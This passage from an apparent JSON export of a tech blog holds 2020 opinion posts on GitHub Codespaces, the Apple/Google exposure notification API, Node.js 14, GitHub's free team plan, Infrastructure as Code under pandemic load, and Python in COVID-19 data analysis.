If Codespaces is a first-class feature in the world\u0026rsquo;s largest code hosting platform, it gets adopted by default. Open source projects can provide contributor-ready environments. Companies can standardize development setups. The network effects are powerful.\nThe Problems That Remain # Let\u0026rsquo;s not get carried away. There are real constraints.\nLatency is still a factor. Even with a fast connection, there\u0026rsquo;s a perceptible delay when typing in a browser-based editor that doesn\u0026rsquo;t exist locally. It\u0026rsquo;s subtle — maybe 50-100ms — but for touch typists, it\u0026rsquo;s distracting. The VS Code remote extension (where you run VS Code locally but connect to a remote server) mitigates this significantly, but then you\u0026rsquo;re back to requiring a local installation.\nCost is unclear. The beta is free, but this will eventually be a paid service. If it\u0026rsquo;s priced per hour of compute time (like Visual Studio Online), the economics for full-time development are questionable. A developer working 8 hours a day on a 4-core, 8GB machine would likely spend more per month than buying a capable laptop. The sweet spot might be occasional use: onboarding, code reviews, quick fixes, open source contributions.\nOffline development is impossible. If your internet goes down, your development environment is gone. For those of us who occasionally code on trains, planes, or in locations with unreliable connectivity, this is a non-starter as a primary environment.\nAnd then there\u0026rsquo;s the elephant in the room: not everyone develops in VS Code. Vim users, Emacs devotees, JetBrains customers — Codespaces doesn\u0026rsquo;t speak to them. The .devcontainer spec is VS Code-specific, which limits its potential as a universal standard for development environments.\nThe Bigger Picture # What excites me about Codespaces isn\u0026rsquo;t the product itself — it\u0026rsquo;s the forcing function it creates. 
The .devcontainer specification is open, and it pushes the industry toward treating development environments as configuration rather than tribal knowledge.\nHow much time do teams waste on environment setup? In my experience, it\u0026rsquo;s measured in days per new hire and hours per week for ongoing maintenance. \u0026ldquo;Works on my machine\u0026rdquo; is a meme because it\u0026rsquo;s universally true. Docker addressed part of this for runtime environments, but the development environment — the IDE configuration, the linters, the debugger setup, the test runner integration — has remained stubbornly manual.\nIf .devcontainer becomes a standard that every repository includes, even developers who never use Codespaces benefit. You\u0026rsquo;d have a machine-readable specification of what the development environment should look like, which local tools could consume just as well as cloud tools.\nMy Take # I won\u0026rsquo;t be switching to Codespaces as my primary development environment. I have a well-tuned local setup that I\u0026rsquo;ve refined over decades, and I\u0026rsquo;m not ready to introduce a hard dependency on internet connectivity for my core workflow.\nBut I\u0026rsquo;m genuinely excited about what this means for a few specific use cases. Contributing to open source projects you\u0026rsquo;ve never worked on before? Enormous improvement. Onboarding new team members? Transformative. Running a workshop or training session? No more \u0026ldquo;let\u0026rsquo;s spend the first hour making sure everyone\u0026rsquo;s environment works.\u0026rdquo;\nThe real question is whether this is the beginning of a fundamental shift or a niche convenience. My gut says it\u0026rsquo;s somewhere in between — cloud development won\u0026rsquo;t replace local development for serious daily work, but it will become a standard supplement. 
Like many tools, its value lies not in replacing what works, but in eliminating what\u0026rsquo;s painful.\nI\u0026rsquo;ve signed up for the beta. I\u0026rsquo;ll report back once I\u0026rsquo;ve put it through its paces on a real project.\n","date":"7 May 2020","externalUrl":null,"permalink":"/posts/200507-github-codespaces-cloud-development/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Satellite 2020 introduces Codespaces, a cloud-based development environment that could change how we think about local toolchains.","title":"GitHub Codespaces — Is Cloud Development Finally Ready?","type":"posts"},{"content":"In any other year, Apple and Google collaborating on a shared API would be the biggest tech story of the decade. In 2020, it\u0026rsquo;s just another Wednesday. The two companies have jointly developed an Exposure Notification system — originally called \u0026ldquo;Contact Tracing\u0026rdquo; before a deliberate rename — that uses Bluetooth Low Energy to help public health authorities track potential COVID-19 exposure. The technical architecture they\u0026rsquo;ve chosen is genuinely interesting, and it has implications well beyond pandemic response. This is part of the broader tech community\u0026rsquo;s mobilization around pandemic response that we\u0026rsquo;re seeing globally.\nHow It Actually Works # The system operates in two phases. Phase one, available now as an API for public health authority apps, works like this: your phone periodically broadcasts a rotating Bluetooth identifier — a random key derived from a daily Temporary Exposure Key (TEK). Other phones in proximity record these identifiers along with signal strength and duration.\nIf you test positive for COVID-19, you can choose to upload your TEKs to a central server. Every phone periodically downloads the published TEKs and checks them against its local log of observed identifiers. 
If there\u0026rsquo;s a match that meets certain risk parameters (close enough, long enough), the user gets a notification.\nThe critical design decision is what stays local and what goes to the server. Your phone\u0026rsquo;s Bluetooth observations — where you\u0026rsquo;ve been, who you\u0026rsquo;ve been near — never leave the device. The only data uploaded are the TEKs of confirmed positive cases, and these are effectively random numbers that reveal nothing about the person\u0026rsquo;s identity or location. The matching happens entirely on-device.\nThis is a fundamentally different architecture from the centralized approaches being pushed by some governments. France\u0026rsquo;s StopCovid app, for instance, uses a centralized model where all contact events are uploaded to a government server. The UK initially went centralized too. The decentralized approach that Apple and Google have chosen — often called the DP-3T model, after the academic protocol it\u0026rsquo;s based on — keeps the sensitive data distributed.\nThe Bluetooth Problem # As someone who\u0026rsquo;s spent considerable time working with IoT devices and Bluetooth protocols, I have a healthy skepticism about BLE-based proximity detection. Bluetooth signal strength (RSSI) is a notoriously unreliable proxy for physical distance. Walls, pockets, bags, body orientation, phone model, case material — all of these affect signal propagation in ways that make precise distance estimation essentially impossible.\nApple and Google are using a combination of signal attenuation, duration thresholds, and configurable risk scoring to try to separate meaningful contacts from noise. The API exposes parameters that public health authorities can tune: minimum duration, signal strength thresholds, risk weighting based on days since exposure. 
But fundamentally, you\u0026rsquo;re trying to answer an epidemiological question with a physical-layer signal that wasn\u0026rsquo;t designed for it.\nThe counter-argument is that perfect accuracy isn\u0026rsquo;t required. If the system catches 60-70% of genuine close contacts with an acceptable false positive rate, it\u0026rsquo;s still more effective than relying on human memory alone. Traditional contact tracing asks \u0026ldquo;who were you near in the last two weeks?\u0026rdquo; — a question most people can\u0026rsquo;t answer accurately even under ideal conditions. An automated system with imperfect accuracy may well outperform an interview-based system with imperfect recall.\nThe Privacy Architecture # What impresses me most about this project is how thoroughly privacy has been baked into the architecture. This isn\u0026rsquo;t privacy as an afterthought or a policy promise — it\u0026rsquo;s privacy as a technical constraint.\nThe Temporary Exposure Keys rotate daily. The Bluetooth identifiers derived from them rotate every 10-20 minutes. There\u0026rsquo;s no persistent identifier that could be used to track a device across time. The server never learns who was exposed — only the device knows, and the notification happens locally. Even the TEKs uploaded by positive cases are stripped of metadata; the server doesn\u0026rsquo;t know which TEKs belong to the same person across days.\nApple and Google have also made explicit commitments about the lifecycle: the system will be disabled region by region when it\u0026rsquo;s no longer needed, and the Bluetooth broadcasting can be turned off by the user at any time. Whether you trust those commitments is a separate question, but the technical architecture genuinely limits what any party — including Apple and Google themselves — can extract from the system.\nThis matters because the failure mode of privacy-invasive contact tracing is severe. 
If people don\u0026rsquo;t trust the system, they won\u0026rsquo;t install the app, and a contact tracing app with 10% adoption is approximately useless. The privacy-preserving design isn\u0026rsquo;t just ethically right — it\u0026rsquo;s pragmatically necessary.\nThe Platform Power Question # There\u0026rsquo;s a less comfortable aspect to this story. Apple and Google control the two mobile operating systems that cover effectively 100% of the smartphone market. By building this at the OS level, they\u0026rsquo;ve made a unilateral decision about how contact tracing should work on mobile devices. Governments that wanted centralized approaches are now facing the reality that their apps will work poorly without OS-level access to Bluetooth — access that Apple in particular has historically restricted for battery and privacy reasons.\nThis is an extraordinary exercise of platform power. It\u0026rsquo;s being used in this case for a purpose most people would consider legitimate, and the privacy-preserving design is arguably better than what most governments would have built on their own. But it sets a precedent. Two companies have effectively overridden national public health technology strategies because they control the platforms. The concentration of power in a few technology companies is increasingly relevant to how critical infrastructure gets built.\nMy Take # I\u0026rsquo;m cautiously optimistic about the Exposure Notification API. The privacy architecture is sound — I\u0026rsquo;ve read the cryptographic specification, and it\u0026rsquo;s well-designed. The Bluetooth accuracy concerns are real but probably acceptable for a supplementary tool. And the decentralized approach is clearly the right call from both an ethical and adoption standpoint. The broader theme of privacy-preserving architecture and open governance will define these critical systems for years to come.\nWhat concerns me is the adoption question. 
For this to work, a substantial percentage of the population needs to install and use a compatible app. The studies I\u0026rsquo;ve seen suggest you need 60%+ adoption for meaningful impact, though lower adoption rates can still provide some benefit. In my experience with IoT deployments, getting people to consistently use Bluetooth-based features is harder than it sounds — between battery concerns, Bluetooth confusion, and general app fatigue.\nWe\u0026rsquo;re in uncharted territory — two platform rivals collaborating on critical public health infrastructure under immense time pressure. As engineers, all we can do is evaluate the architecture on its merits, push for transparency, and hope the implementation lives up to the specification.\n","date":"30 April 2020","externalUrl":null,"permalink":"/posts/200430-apple-google-exposure-notification-api/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple and Google collaborate on a Bluetooth-based exposure notification system that puts privacy-preserving architecture front and center.","title":"Apple and Google's Exposure Notification API — Privacy Engineering at Scale","type":"posts"},{"content":"Node.js 14 dropped on April 21st, right on schedule. As someone who\u0026rsquo;s been building with Node since the early days — back when we were still arguing about whether JavaScript on the server was a terrible idea — each major release is a chance to take stock of where the platform is heading. And Node 14 tells an interesting story: the platform is growing up, focusing less on flashy new syntax and more on the plumbing that makes production systems reliable.\nThe Headline Features # Let\u0026rsquo;s start with what\u0026rsquo;s new. The V8 engine bumps to version 8.1, which brings Optional Chaining (?.) and Nullish Coalescing (??) out of the flag zone and into stable territory. 
If you\u0026rsquo;ve been using TypeScript, you\u0026rsquo;ve had these for a while, but having them natively in Node without a compilation step is welcome. They\u0026rsquo;re the kind of small ergonomic improvements that reduce boilerplate without introducing complexity.\nMore interesting to me is the experimental support for WASI — the WebAssembly System Interface. This isn\u0026rsquo;t just \u0026ldquo;run WebAssembly in Node\u0026rdquo; (we\u0026rsquo;ve had that since Node 8 with the WebAssembly global). WASI is about giving WebAssembly modules a standardized way to interact with the operating system: reading files, accessing environment variables, working with clocks. It\u0026rsquo;s sandboxed by design, capability-based, and it points toward a future where you can run untrusted code with fine-grained permissions. The security-first approach mirrors Deno\u0026rsquo;s philosophy in runtime design.\nThe --experimental-wasi-unstable-preview1 flag doesn\u0026rsquo;t exactly roll off the tongue, and the API is explicitly unstable. But the direction is clear. Imagine being able to load a third-party computation module — written in Rust, C, or any language that compiles to Wasm — and run it in your Node process with confidence that it can only access the resources you explicitly grant. For plugin architectures, serverless runtimes, and edge computing, this is compelling.\nDiagnostics Get Serious # The feature I\u0026rsquo;m most excited about is the improvements to the diagnostics tooling. Node 14 introduces experimental Async Local Storage in the async_hooks module, which finally provides a clean way to propagate context across async boundaries without manually threading it through every function call.\nIf you\u0026rsquo;ve ever tried to implement request tracing in a Node.js HTTP server, you know the pain. 
You get a request, you want to tag every log line with the request ID, but your code calls into libraries that call into other libraries, all with async/await or callbacks, and suddenly your nice request context is lost. The common workarounds — using cls-hooked, monkey-patching, or explicitly passing context objects — range from fragile to ugly.\nAsyncLocalStorage is the platform\u0026rsquo;s answer. It\u0026rsquo;s conceptually similar to thread-local storage in languages with real threads. You create a store, run a function within it, and any async operations spawned from that function can access the store. It works across setTimeout, Promises, async/await, and even event emitters. This is genuinely useful infrastructure for anyone building production Node services.\nThe diagnostic reports feature, which was experimental since Node 12, has also been promoted to stable. These reports give you a JSON snapshot of the process state — JavaScript and native stacks, heap statistics, resource usage, loaded libraries — that you can trigger programmatically or on specific signals. Think of it as a lightweight alternative to full core dumps that\u0026rsquo;s actually practical to collect in production.\nThe module situation # The ECMAScript modules story continues its slow march toward stability. In Node 14, ESM support is no longer behind a flag — import/export syntax works out of the box (with the usual .mjs extension or \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json). But \u0026ldquo;unflagged\u0026rdquo; doesn\u0026rsquo;t mean \u0026ldquo;settled.\u0026rdquo; The dual CJS/ESM ecosystem remains messy.\nThe practical reality is that most of the npm ecosystem is still CommonJS. If you\u0026rsquo;re writing a library, you need to either ship dual CJS/ESM builds or accept that some consumers will have issues. 
The conditional exports feature in package.json (stable in Node 14) helps — you can specify different entry points for require() and import — but it adds complexity to package configuration that many library authors would rather not deal with.\nI\u0026rsquo;ve been gradually migrating some of my projects to ESM, and my honest assessment is: it\u0026rsquo;s fine for applications, it\u0026rsquo;s still painful for libraries. Give it another year. By the time Node 14 reaches end-of-life, I expect the tooling and ecosystem will have caught up. For now, if you\u0026rsquo;re starting a new application (not a library), ESM is worth considering. For libraries, keep shipping CJS with optional ESM wrappers.\nWhat\u0026rsquo;s Coming in October # Node 14 enters Active LTS in October 2020, replacing Node 12 as the recommended production version. This is the real milestone. Right now, Node 14 is in \u0026ldquo;Current\u0026rdquo; status, which means it\u0026rsquo;ll get new features until October, at which point it freezes for stability. If you\u0026rsquo;re on Node 12 in production, start testing against 14 now — you have six months to identify breaking changes and update dependencies.\nThe breaking changes are relatively mild this cycle. The major one is the removal of some deprecated crypto APIs and the switch to OpenSSL 1.1.1, which means TLS 1.3 support by default. There are also some changes to fs.promises and stream APIs that might bite you if you were relying on undocumented behavior.\nMy Take # Node.js 14 isn\u0026rsquo;t a release that makes you rewrite your applications. It\u0026rsquo;s a release that makes your existing applications easier to debug, easier to monitor, and slightly more pleasant to write. The WASI support is the most forward-looking feature, but it won\u0026rsquo;t be practical for production use for at least a year. 
Meanwhile, the npm consolidation ensures that the ecosystem infrastructure continues to evolve alongside the runtime.\nWhat I appreciate most about Node\u0026rsquo;s release cadence is the predictability. Every six months, a new major version. Every October, the even-numbered version goes LTS. You can plan for it. After thirty years of watching platforms come and go, I\u0026rsquo;ve learned that boring and predictable beats exciting and unpredictable every single time.\nIf you\u0026rsquo;re running Node in production, start your Node 14 compatibility testing now. Update your CI matrices, run your test suites, check your native addons. October will be here faster than you think, and you don\u0026rsquo;t want to be scrambling to upgrade when 12 starts winding down.\n","date":"23 April 2020","externalUrl":null,"permalink":"/posts/200423-nodejs-14-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 14 launches with experimental WebAssembly System Interface support, improved diagnostics, and a clear path to long-term support in October.","title":"Node.js 14 Arrives — Diagnostics, WASI, and the Road to LTS","type":"posts"},{"content":"Two days ago, GitHub made an announcement that would have been unthinkable just a few years back: all of GitHub\u0026rsquo;s core features are now free for everyone, including teams. Unlimited private repositories with unlimited collaborators. No paywall. Let that sink in for a moment. This move accelerated GitHub\u0026rsquo;s platform consolidation by removing price as a barrier to adoption.\nIf you\u0026rsquo;d told me in 2015 that Microsoft would buy GitHub and then proceed to make it more open and accessible, I\u0026rsquo;d have questioned your judgement. Yet here we are, and this move feels like a genuine inflection point for how we think about developer tooling and collaboration.\nWhat Actually Changed # The details matter here. 
GitHub Free now includes unlimited private repositories with unlimited collaborators — something that previously required a paid Team plan. The new GitHub Free for organizations also bundles in 2,000 Actions minutes per month and 500MB of GitHub Packages storage. For many small teams and startups, this eliminates the single biggest reason to look elsewhere.\nThe paid Team plan itself dropped from $9/user/month to $4/user/month, adding features like code owners, required reviewers, and draft pull requests. Enterprise features remain separate, naturally — GitHub still needs revenue. But the core collaboration workflow? That\u0026rsquo;s now free.\nThis is significant because it removes friction at exactly the point where developers make tooling decisions. When you\u0026rsquo;re starting a side project with a few friends, or bootstrapping a startup, or running an open source project that needs some private CI infrastructure — you no longer hit that awkward moment where someone has to pull out a credit card.\nThe Strategic Play # Let\u0026rsquo;s be honest about what\u0026rsquo;s happening here. GitHub has more than 40 million developers on the platform. Microsoft\u0026rsquo;s play isn\u0026rsquo;t about charging $4/user/month for private repos — it\u0026rsquo;s about making GitHub the default collaboration layer for every developer on the planet, then building enterprise services on top of that foundation. Actions, Codespaces, and Packages represent this broader platform strategy beyond just code hosting.\nActions, Packages, Codespaces (still in beta), the security advisory database, the dependency graph — these are the revenue drivers. The basic Git hosting and collaboration? That\u0026rsquo;s the moat. By removing the last friction point for teams, GitHub is effectively saying: \u0026ldquo;We don\u0026rsquo;t want anyone to have a reason not to be here.\u0026rdquo;\nFrom a competitive standpoint, this puts serious pressure on GitLab and Bitbucket. 
GitLab has been winning deals with teams who couldn\u0026rsquo;t justify GitHub\u0026rsquo;s per-seat pricing, especially in the CI/CD space where GitLab\u0026rsquo;s integrated pipelines were compelling enough to offset the less polished UI. Now that calculus changes. GitHub Actions is maturing rapidly, and with free private repos, the \u0026ldquo;GitLab is cheaper\u0026rdquo; argument largely evaporates.\nWhat This Means for the Ecosystem # I\u0026rsquo;ve been running a mix of GitHub and self-hosted Gitea instances for various projects. The self-hosted approach made sense when private repos on GitHub meant paying per seat — especially for IoT projects where I wanted to keep firmware code private but didn\u0026rsquo;t want to justify the cost for a two-person side project.\nWith this change, I\u0026rsquo;m genuinely reconsidering that setup. Self-hosting a Git server isn\u0026rsquo;t hard, but it\u0026rsquo;s one more thing to maintain, one more thing to back up, one more thing to keep patched. If GitHub offers equivalent functionality for free, the operational overhead of self-hosting becomes harder to justify unless you have specific compliance or data sovereignty requirements.\nFor the broader open source community, this is almost entirely positive. Projects that maintained awkward split workflows — public repos for code, private repos elsewhere for CI configs or deployment scripts — can consolidate. Teams that were using GitHub for open source but Bitbucket for private work can simplify their toolchain. This consolidation mirrors the trend seen with npm\u0026rsquo;s acquisition and broader developer platform integration.\nThe 2,000 Actions minutes per month is particularly interesting. That\u0026rsquo;s enough for a reasonable CI/CD pipeline for a small project. Not enough for heavy integration testing or nightly builds across multiple platforms, but enough to get started without any cost. 
Combined with the existing free tier for public repos (which already had unlimited Actions minutes), this makes GitHub a genuinely complete platform for small-to-medium projects.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when free services from large companies felt like traps. And maybe there\u0026rsquo;s an element of that here — once your entire workflow is on GitHub, the switching costs are enormous, and Microsoft knows it. But I also think there\u0026rsquo;s a more pragmatic reading: developer tools are becoming infrastructure, and the economics of infrastructure favor scale and low margins on the base layer.\nGitHub making core features free is good for developers. Full stop. The question isn\u0026rsquo;t whether to be grateful — it\u0026rsquo;s whether to be cautious. I\u0026rsquo;d still recommend that teams maintain the ability to export their repos and CI configurations. Don\u0026rsquo;t build workflows that are impossible to migrate. Use standard tooling where you can.\nBut for right now? If you\u0026rsquo;re a small team weighing GitHub against alternatives, the math just got a lot simpler. The platform is strong, the ecosystem is deep, and the price is right. Sometimes the boring, obvious choice is also the correct one.\nThe timing during a global pandemic — when countless developers are working from home and collaboration tooling matters more than ever — feels deliberate. Smart move, GitHub.\n","date":"16 April 2020","externalUrl":null,"permalink":"/posts/200416-github-free-for-teams/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub drops pricing barriers for teams, making unlimited private repos and essential collaboration features free for everyone.","title":"GitHub Free for Teams — What This Means for Open Source and Beyond","type":"posts"},{"content":"A month into the global lockdown, and infrastructure teams everywhere are running on caffeine and Terraform plans. 
The shift to remote work didn\u0026rsquo;t just increase traffic — it fundamentally changed traffic patterns. VPN concentrators that handled 10% of the workforce are now handling 100%. Video conferencing backends that provisioned for peak meeting hours are seeing all-day sustained load. And the teams managing all of this are doing it from their kitchen tables.\nI\u0026rsquo;ve been talking to infrastructure engineers across several companies this week, and a clear pattern is emerging: organizations that invested in Infrastructure as Code (IaC) practices are weathering this storm dramatically better than those still managing infrastructure manually. It\u0026rsquo;s not even close.\nThe Scaling Stories # Let me share a few anonymized examples of what I\u0026rsquo;m hearing:\nCompany A (financial services, ~5,000 employees) had their VPN infrastructure defined in Terraform with auto-scaling groups. When remote work mandates hit, they modified a few variables — instance count, instance type — ran terraform plan, reviewed the diff, and terraform apply. New VPN capacity was live in under an hour. Total downtime: zero.\nCompany B (similar size, similar industry) managed their VPN infrastructure through a combination of manual provisioning and shell scripts accumulated over five years. Scaling up required someone to log into the AWS console, manually launch instances, configure them by hand, update load balancer targets, and modify security groups. It took three days and two misconfigurations that caused outages.\nThe difference isn\u0026rsquo;t talent. Company B has excellent engineers. The difference is that Company A had codified their infrastructure decisions into version-controlled, reviewable, repeatable artifacts. 
When the crisis hit, they could adapt quickly because changing infrastructure meant changing code, not performing a sequence of manual steps from memory.\nTerraform, CloudFormation, and the State Problem # Terraform has emerged as the de facto standard for multi-cloud IaC, and its usage has reportedly spiked in the past month. HashiCorp\u0026rsquo;s Terraform Cloud saw a significant increase in runs as teams scrambled to scale. Years later, OpenTofu would emerge as an open-source alternative to Terraform, providing additional choice in the infrastructure-as-code landscape.\nBut Terraform\u0026rsquo;s state management — always its Achilles\u0026rsquo; heel — is causing pain at scale. Teams that were casually sharing state files in S3 buckets without proper locking are experiencing state corruption during concurrent modifications. When three engineers all need to scale different parts of the infrastructure simultaneously, state locking isn\u0026rsquo;t optional anymore.\nI\u0026rsquo;ve been recommending Terraform Cloud or at minimum a properly configured S3 backend with DynamoDB locking to every team I talk to. The free tier of Terraform Cloud handles remote state management well enough for most teams. But honestly, this should have been set up before the crisis, not during it.\nCloudFormation users, meanwhile, are dealing with their own challenges. AWS service limits — which many teams never thought about because they never approached them — are suddenly relevant. EC2 instance limits, EIP limits, NAT Gateway limits per AZ — all of these require support tickets to increase, and AWS support response times have understandably slowed as every customer makes the same requests simultaneously.\nAnsible and Configuration Drift # Infrastructure provisioning is only half the story. Once the servers exist, they need to be configured. Ansible, which many teams use for configuration management, is proving its worth — but also exposing a common anti-pattern. 
The importance of treating infrastructure as code would become increasingly critical as platforms matured and configuration drift became more costly.\nTeams that ran Ansible playbooks regularly (ideally on every commit to their config repo) are in good shape. Their configurations are consistent, their playbooks are tested, and scaling out means running the same playbook against new hosts. Teams that only ran Ansible during initial setup and then made manual changes to running systems are discovering the hard way what \u0026ldquo;configuration drift\u0026rdquo; means.\nI spoke with one SRE who described their situation bluntly: \u0026ldquo;We have Ansible playbooks, but they haven\u0026rsquo;t been run against production in eight months. Nobody trusts them anymore.\u0026rdquo; They\u0026rsquo;re essentially back to manual configuration, but with the added confusion of Ansible playbooks that may or may not reflect reality.\nThe lesson is one that the DevOps community has been preaching for years: IaC only works if it\u0026rsquo;s the only way you change infrastructure. The moment someone SSH\u0026rsquo;s in and makes a manual change, your code and your reality diverge.\nThe Monitoring Gap # Scaling infrastructure is one thing. Knowing whether it\u0026rsquo;s working is another. I\u0026rsquo;m seeing a lot of teams that scaled their application infrastructure but forgot to scale their monitoring. Prometheus instances running out of memory because they\u0026rsquo;re scraping three times as many targets. Elasticsearch clusters for log aggregation hitting storage limits. PagerDuty alert fatigue as thresholds calibrated for normal traffic fire constantly under pandemic loads.\nThe best-prepared teams had their monitoring infrastructure defined in the same IaC pipelines as their application infrastructure. Scale the app, the monitoring scales with it. But that level of maturity is still rare. 
Most organizations have a gap between their IaC practices for \u0026ldquo;the application\u0026rdquo; and \u0026ldquo;everything else.\u0026rdquo;\nGrafana dashboards, at least, have become a universal language. I\u0026rsquo;ve seen more screenshots of Grafana boards in Slack channels this month than in the previous year combined. If nothing else, this crisis is teaching everyone the value of observability.\nWhat We Should Learn # When this crisis eventually subsides (and it will), I hope infrastructure teams take three lessons forward:\nIaC is not optional. If your infrastructure can\u0026rsquo;t be reproduced from code, it can\u0026rsquo;t be scaled reliably under pressure. Full stop.\nPractice your scaling procedures. Chaos engineering — which sometimes feels like a luxury — is actually preparation for exactly this kind of scenario. If you\u0026rsquo;ve never tested scaling your VPN infrastructure by 10x, you don\u0026rsquo;t actually know if your Terraform configs support it.\nTreat monitoring and observability as first-class infrastructure. Your Prometheus, Grafana, and logging stack should be in the same Terraform modules as your application. If they\u0026rsquo;re not, they won\u0026rsquo;t scale when you need them to.\nMy Take # I\u0026rsquo;ve been advocating for Infrastructure as Code since long before it had a catchy name. We used to call it \u0026ldquo;scripting your environment\u0026rdquo; and it was considered a nice-to-have. The pandemic is proving what many of us always knew: it\u0026rsquo;s a necessity.\nThe good news is that the tooling has never been more mature. Terraform, Ansible, Pulumi, CloudFormation, CDK — there are excellent options for every use case and cloud provider. The barrier isn\u0026rsquo;t tooling; it\u0026rsquo;s organizational discipline.\nIf your team is currently in firefighting mode, manually scaling things to keep the lights on — that\u0026rsquo;s okay. Survive first. 
But once the immediate crisis passes, take what you learned about your infrastructure\u0026rsquo;s weaknesses and codify the fixes. Write the Terraform. Write the Ansible. Set up the state locking. Make sure the next crisis — and there will be a next one — finds you in Company A\u0026rsquo;s position, not Company B\u0026rsquo;s.\n","date":"9 April 2020","externalUrl":null,"permalink":"/posts/200409-infrastructure-as-code-pandemic-scaling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The sudden shift to remote work has stress-tested Infrastructure as Code practices at unprecedented scale. Here’s what’s working, what’s breaking, and what we should learn.","title":"Infrastructure as Code Under Pressure — Lessons from Pandemic-Scale Scaling","type":"posts"},{"content":"Three weeks into lockdown, and my Twitter feed has transformed into an endless scroll of matplotlib charts and pandas DataFrames. Everyone, it seems, is an epidemiologist now — or at least an armchair data analyst. But beneath the noise of hastily plotted exponential curves, there\u0026rsquo;s a genuine story about how Python\u0026rsquo;s data science ecosystem is being stress-tested in a way no one anticipated.\nThe COVID-19 pandemic has become the largest real-world deployment of Python-based data analysis in history. Governments, universities, and research labs are all reaching for the same stack: Python, Jupyter, pandas, NumPy, scikit-learn, and increasingly, PyTorch and TensorFlow for more sophisticated modeling. Having worked with Python since the 1.x days, watching it become the lingua franca of crisis response is both impressive and slightly terrifying.\nThe Jupyter Notebook Explosion # Jupyter notebooks have become the medium of choice for sharing COVID-19 analysis. The reasons are obvious — they combine code, visualizations, and narrative in a single document that both technical and non-technical stakeholders can follow. 
Researchers at Imperial College London, the University of Washington\u0026rsquo;s IHME, and dozens of other institutions are publishing their models as notebooks.\nThe COVID-19 Open Research Dataset (CORD-19), which I mentioned a few weeks ago, now contains over 44,000 scholarly articles. The Allen Institute for AI, Microsoft, and the National Library of Medicine assembled it specifically to enable computational analysis. Kaggle is hosting challenges to extract insights using NLP techniques.\nI\u0026rsquo;ve been spending my evenings working through some of these notebooks, and the quality varies enormously. Some are rigorous, well-documented analyses from domain experts who happen to know Python. Others are\u0026hellip; less so. The democratization of data science tools means that anyone with pip install pandas can produce a chart that looks authoritative. Whether the underlying analysis is sound is another matter entirely.\nSIR Models and Their Limitations # The most common analytical framework showing up in Python notebooks right now is the SIR (Susceptible-Infected-Recovered) model and its variants (SEIR, SEIRD). These compartmental models have been used in epidemiology for nearly a century, and they translate naturally into systems of differential equations that SciPy can solve.\nA basic SIR model in Python is maybe 30 lines of code with scipy.integrate.odeint. It\u0026rsquo;s elegant and approachable, which is precisely the problem. I\u0026rsquo;ve seen dozens of blog posts and notebooks where developers with no epidemiological background fit an SIR model to Johns Hopkins data and draw sweeping conclusions about infection trajectories.\nThe models are sensitive to their parameters — particularly the basic reproduction number (R₀) and the recovery rate. Small changes in these values produce dramatically different projections. 
Professional epidemiologists spend years learning how to estimate these parameters, account for reporting biases, and interpret results within appropriate uncertainty bounds. A three-paragraph Medium post with a matplotlib chart doesn\u0026rsquo;t capture any of that nuance.\nThis isn\u0026rsquo;t Python\u0026rsquo;s fault, of course. It\u0026rsquo;s a communication problem. But it\u0026rsquo;s exacerbated by how easy Python makes it to go from \u0026ldquo;I wonder what this data looks like\u0026rdquo; to \u0026ldquo;here\u0026rsquo;s my published analysis\u0026rdquo; in an afternoon.\nWhere Python Is Genuinely Helping # Setting aside the amateur hour, Python is doing crucial work in several areas:\nHospital resource planning: Teams are using pandas and optimization libraries to model ICU capacity, ventilator allocation, and PPE supply chains. The COVID-19 Hospital Impact Model (CHIME) from Penn Medicine is an excellent example — a Streamlit app that lets hospital administrators project patient loads based on local parameters.\nGenomic analysis: Biopython and related tools are being used to analyze SARS-CoV-2 genome sequences, tracking mutations and understanding viral evolution. The Nextstrain project uses Python extensively in its pipeline for phylogenetic analysis.\nNLP on research literature: With tens of thousands of papers being published, NLP techniques — topic modeling, named entity recognition, summarization — are essential for keeping up. The spaCy and Hugging Face ecosystems are seeing heavy use here.\nDashboard and visualization: Plotly Dash, Streamlit, and Bokeh are powering dozens of public-facing dashboards that health officials and journalists rely on daily.\nThe Reproducibility Challenge # One issue I keep running into is reproducibility. 
Different Python environments, different package versions, different data snapshots — it\u0026rsquo;s the same problem that\u0026rsquo;s plagued data science for years, but amplified by the urgency of the situation.\nA notebook that worked last week might produce different results today because the underlying dataset was revised (which happens constantly as countries backfill their reporting). Models that were fit to data from two weeks ago may already be obsolete as lockdown measures change the dynamics.\nThe best projects I\u0026rsquo;ve seen address this explicitly: they pin their dependencies, version their data, and document their assumptions clearly. The worst just have a requirements.txt that says pandas without a version number. If the pandemic teaches the data science community one thing, I hope it\u0026rsquo;s that reproducibility isn\u0026rsquo;t optional.\nMy Take # Python\u0026rsquo;s role in the pandemic response is a double-edged sword. On one hand, having a free, accessible, powerful data analysis stack means that more people can contribute to understanding the crisis. On the other hand, the low barrier to entry means that misleading analyses spread almost as fast as the virus itself.\nMy advice to fellow developers who are tempted to do COVID-19 data analysis: do it. It\u0026rsquo;s a great learning exercise. But before you hit publish, ask yourself whether you\u0026rsquo;d trust your analysis if it were about a topic you actually know deeply. If the answer is no, maybe share it with a caveat or collaborate with someone who has domain expertise.\nThe tools have never been better. Python 3.8, pandas 1.0, the maturing Jupyter ecosystem — we\u0026rsquo;re in a golden age of accessible data science. The responsibility now is to use these tools wisely, especially when lives depend on the conclusions people draw from our charts.\nStay home. Write Python. 
